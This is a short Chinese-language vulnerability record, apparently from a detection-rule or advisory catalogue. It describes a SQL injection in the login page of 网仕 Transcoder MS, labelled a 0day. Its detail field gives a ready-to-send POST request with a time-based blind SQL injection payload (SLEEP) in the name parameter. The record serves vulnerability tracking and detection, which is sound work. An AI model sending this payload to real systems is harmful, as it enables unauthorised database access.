vendor = "网仕"
name = "上海网仕科技 Transcoder MS index.php SQL注入"
type = "SQL注入"
version = "未知"
path = "/webtrans/index.php"
detail = "POST /webtrans/index.php?controller=user%action=login HTTP/1.1 name=testaaa;) AND (SELECT 3333 FROM (SELECT(SLEEP(4)))xSEI) AND ('aFKS'='aFKS&pass=QWR5U2VjCg%3D%3D&lang=zh_CN"
fix = "缺省规则可检出"
date = "0724"
label = "0day"
verifier = "AdySec"
